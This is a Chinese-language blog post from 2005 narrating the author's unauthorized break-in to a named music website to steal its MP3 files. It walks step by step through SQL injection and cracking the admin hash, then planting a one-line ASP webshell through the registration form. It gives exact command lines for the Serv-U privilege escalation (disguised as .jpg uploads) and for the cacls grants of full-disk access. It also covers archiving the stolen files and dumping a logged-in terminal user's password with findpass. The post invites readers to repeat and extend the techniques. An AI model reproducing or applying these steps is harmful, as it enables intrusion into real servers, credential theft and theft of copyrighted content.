webshell下的一次得到終端帳號和密碼的嘗試

文章作者:LvHuaNa[F.S.T]     文章來源:http://lvhuana.blogchina.com/     發布時間:2005-04-01 10:40:13

今天老婆相中了一個音樂網站，裡面有很多混音，可能聽上去很棒吧，誰知道呢，俺又不喜歡那些東東。由於我整天吹牛說我黑過一些網站，老婆非要我把那些混音搞下來，沒辦法了，為了婚姻幸福，為了我的後半生的衣服有人洗，飯有人做，我就上去看看了。。。。。   首先來到http://www.spmix.com/這裡看看，嘿嘿，.asp指令碼做的網站，不錯的樣子。看到還有論壇呀，趕快上去瞧了瞧，LeadBBS v2.88，暈了，這個版本怎麼沒有見過，為了節省時間，我撤退到其他的分站找漏洞去，嘿嘿。   看了看站內留言分站也沒有找到資料庫或是conn.asp漏洞什麼的，看來我又要找其他的地方突破了。然後找到http://www.spmix.com/all/dj/這個分站，隨手開啟裡面的最新熱門檔案，一看url http://www.spmix.com/all/dj/ArticleShow.asp?ArticleID=379，ArticleShow.asp?ArticleID=379好熟悉呀，就是忘記是什麼系統了。鬱悶下，呵呵。and 1=1和and 1=2一下先，返回了不同頁面，基本判斷有注入存在了，拿出啊D跑一下吧，嘿嘿，俺人懶，只愛用工具。一會時間，管理員帳號和密碼就出來了（圖一），鬱悶的是密碼是md5加密的16位密碼。再拿出可愛的動網md5破解器來跑md5密碼吧。跑密碼的時候順便用啊D來猜解一下網站的後台登陸地址，嘿嘿，合理的利用時間很重要。不出幾分鐘，密碼和後台地址都跑出來了（圖二，圖三），高興中，今天運氣真好，md5都跑出來了。拿著帳號密碼成功登陸進後台一看，傻了，原來是大類管理員，只能添加審核文章，並沒有可愛的上傳或備份一類的功能應用。。再仔細找找吧，突然看到常見問題這裡（圖四），有預設的資料庫名稱，實驗一下吧，如果資料庫名字再被改動了，那我看來只能向老婆承認以前我純數吹牛了....在ie裡面輸入http://www.spmix.com/all/dj/database/article.asp這個預設資料庫地址後，我狂喜起來，看來他並沒有更改資料庫名字，而且資料庫是.asp尾碼的，沒有做任何的防下載處理，這下我想到了插庫（嘿嘿，可以直接得到webshell的一個簡單辦法）。回到首頁去註冊一個id先，根據經驗，一般註冊那裡都不會做什麼處理就直接把資料寫進資料庫的。密碼問題這裡填上藍屏的一句話木馬（圖五），然後點註冊，然後拿出藍屏一句話木馬的利用頁面向資料庫提交資料試試看能不能插庫成功。提交真順利，呵呵，可愛的webshell出現了（圖六）。然後再用得到的這個webshell寫進去一個大的webshell，我喜歡用海陽系列，功能強大，就寫進去最近新出的2006a吧，呵呵。寫進去後登陸2006a後在硬碟裡面到處瀏覽了一下，發現這個機器對許可權配置的挺嚴格的，不能瀏覽本網站以外的目錄，並且沒有發現老婆想要的那些混音音樂，汗，連webshell都有了，找不到那些音樂不是要丟人了......再轉到執行cmd那裡試試能不能執行cmd命令吧，如果有許可權了，那不論他把音樂放在什麼地方我們都可以得到它們了。   進入到WScriptShell命令列操作模組隨手輸入了net start後驚喜的發現可以執行cmd命令，並且看到了可愛的serv-u ftp伺服器也在開放的服務裡面，嘿嘿，這下很有可能要提升許可權成功了，不但看到了serv-u服務，還看到了可愛的Terminal Services終端服務也開放了，嘿嘿，又陰笑了兩聲，又有可能得到一個3389肉雞了。執行一下netstat -an後察看一下連接埠先，發現tcp裡面真的有43958連接埠在開放著，這個管理員看來還沒有來得及更改一下這些serv-u的預設的並且是危險的東西。再回到FSO檔案瀏覽器這個模組裡面上傳serv-u本地提升許可權的su.exe去，這裡我把su.exe改了一下名字，改成test.jpg上傳上去（不要著急，呵呵，在shell模式下，不論什麼尾碼都是要當作.exe可執行檔來執行的^_^），傳完後，再回到WScriptShell命令列操作模組執行： D:/SpMix.com/Www.SpMix.Com/all/dj/database/test.jpg "cacls.exe c: /e /t /g everyone:F" D:/SpMix.com/Www.SpMix.Com/all/dj/database/test.jpg "cacls.exe d: /e /t /g everyone:F" D:/SpMix.com/Www.SpMix.Com/all/dj/database/test.jpg "cacls.exe e: /e /t /g everyone:F" 把C，D，E盤都設定成everyone可以瀏覽控制。OK，執行順利進行了（圖七）。然後在各個盤裡仔細找了一會，終於在D:/Mp3.Spmix.com/dingshi/檔案夾裡面找到了所有的.mp3音樂，再上傳一個rar.exe（這裡我改名為test1.jpg了，上傳到D:/SpMix.com/Www.SpMix.Com/all/dj/database/檔案夾下），回到WScriptShell命令列操作模組執行打包命令： D:/SpMix.com/Www.SpMix.Com/all/dj/database/test1.jpg a -r D:/SpMix.com/Www.SpMix.Com/all/dj/database/mp3.rar D:/Mp3.Spmix.com/dingshi/ 把D:/Mp3.Spmix.com/dingshi/檔案夾下所有的音樂檔案打包到D:/SpMix.com/Www.SpMix.Com/all/dj/database/檔案夾下，命名為mp3.rar。執行時間比較長，因為檔案比較多，超出了指令碼啟動並執行最長時間，不過沒有關係，等一會再到D:/SpMix.com/Www.SpMix.Com/all/dj/database/檔案夾下一看，嘿嘿，mp3.rar檔案已經靜靜的躺在那裡了，可以下載了。任務完成！以後看來我又可以好好在老婆面前吹牛一番了^_^。   想了想之後，我決定再突破一下，得到終端管理的帳號和密碼多好呀，那樣不是又多了一台肉雞麼，說幹就幹，首先在D:/SpMix.com/Www.SpMix.Com/all/dj/database/檔案夾下建立一個1.bat的檔案，內容為：query user >D:/SpMix.com/Www.SpMix.Com/all/dj/database/1.txt 然後返回到WScriptShell命令列操作模組執行： D:/SpMix.com/Www.SpMix.Com/all/dj/database/test.jpg "D:/SpMix.com/Www.SpMix.Com/all/dj/database/1.bat" 這樣做的用處是可以看到query user命令執行的回顯，如果有串連使用者的話，我就可以再傳上去token.exe和findpass.exe來得到串連的使用者的帳號和密碼了。執行完命令後回到FSO檔案瀏覽器下看到已經有一個1.txt躺在那裡了，點"編輯"看看裡面的內容，不出所料，果然有終端使用者lognic在上面連著呢(圖八）。再上傳token.exe和findpass.exe（我改名上傳為t.jpg和f.jpg了），上傳完後再編輯一下那個1.bat檔案，內容編輯為：D:/SpMix.com/Www.SpMix.Com/all/dj/database/t.jpg >>D:/SpMix.com/Www.SpMix.Com/all/dj/database/1.txt 然後返回到WScriptShell命令列操作模組執行： D:/SpMix.com/Www.SpMix.Com/all/dj/database/test.jpg "D:/SpMix.com/Www.SpMix.Com/all/dj/database/1.bat" 執行完後FSO檔案瀏覽器接著看那個1.txt檔案的內容，嘿嘿，那個終端使用者lognic的pid值和域都出來了（圖九），我們可以執行findpass.exe來得到他的密碼了。接著編輯1.bat檔案，內容為： D:/SpMix.com/Www.SpMix.Com/all/dj/database/f.jpg PER-71E34D73E lognic 952 >>D:/SpMix.com/Www.SpMix.Com/all/dj/database/1.txt 然後返回到WScriptShell命令列操作模組執行： D:/SpMix.com/Www.SpMix.Com/all/dj/database/test.jpg "D:/SpMix.com/Www.SpMix.Com/all/dj/database/1.bat" 最後我們在返回FSO檔案瀏覽器接著看那個1.txt檔案的內容，哈哈，lognic的密碼也出來了（鑒於個人隱私，我就不再捕圖了）。大功告成，得到了帳號和密碼了，又多了一台終端肉雞了。清理掉所有的檔案後就可以撤退了，webshell也清理掉了，反正知道了他的資料庫地址了，以後管理員改密碼了我就再插庫就可以了。這裡給大家示範的只是webshell下的一些小小的操作，大家可以舉一反三來進行更多的操作，要知道有serv-u漏洞的話，我們在webshell下可以進行的操作是和他原生cmd.exe上進行的命令是一模一樣的，無非就是多了.bat和.txt檔案而已。   不說了，該讓出電腦來讓老婆來欣賞那些混音音樂了。大家再見。